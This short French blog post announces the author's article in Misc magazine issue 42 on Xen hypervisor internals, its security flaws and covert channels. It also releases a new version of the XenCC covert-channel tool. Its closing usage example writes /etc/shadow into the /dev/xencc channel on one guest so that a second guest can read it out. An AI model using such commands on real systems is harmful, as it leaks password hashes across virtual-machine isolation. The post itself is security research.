Misc 42 : La virtualisation
Par Mickaël le 6 mars 2009, 08h24 - Commentaires - Lien permanent
Voici un numéro de Misc tournant autour de la virtualisation, et bien sur de l'impact que cela peut avoir sur la sécurité : « La virtualisation : vecteur de vulnérabilité ou de sécurité ? ».
Ma contribution donne le point de vue du système Xen et de son interaction avec les différents acteurs que sont les domaines virtualisés. La première partie du « Voyage dans l’antre de Xen » est un aperçu des rouages mis en place pour faire fonctionner cette machinerie. La deuxième partie traite des aspects sécurité de l'hyperviseur, de quelques « failles » qui ont été mises à jour, et une introduction aux canaux cachés avec XenCC.
J'en profite également pour mettre en ligne une nouvelle version de XenCC avec un peut moins de bogues et surtout une utilisation simplifiée :
dom1:~# f=/etc/shadow
dom1:~# dd if="$f" of=/dev/xencc obs=`ls -l "$f" | awk '{print $5}'`
...dom1 attend la lecture de dom2...
dom2:~# cat /dev/xencc > data

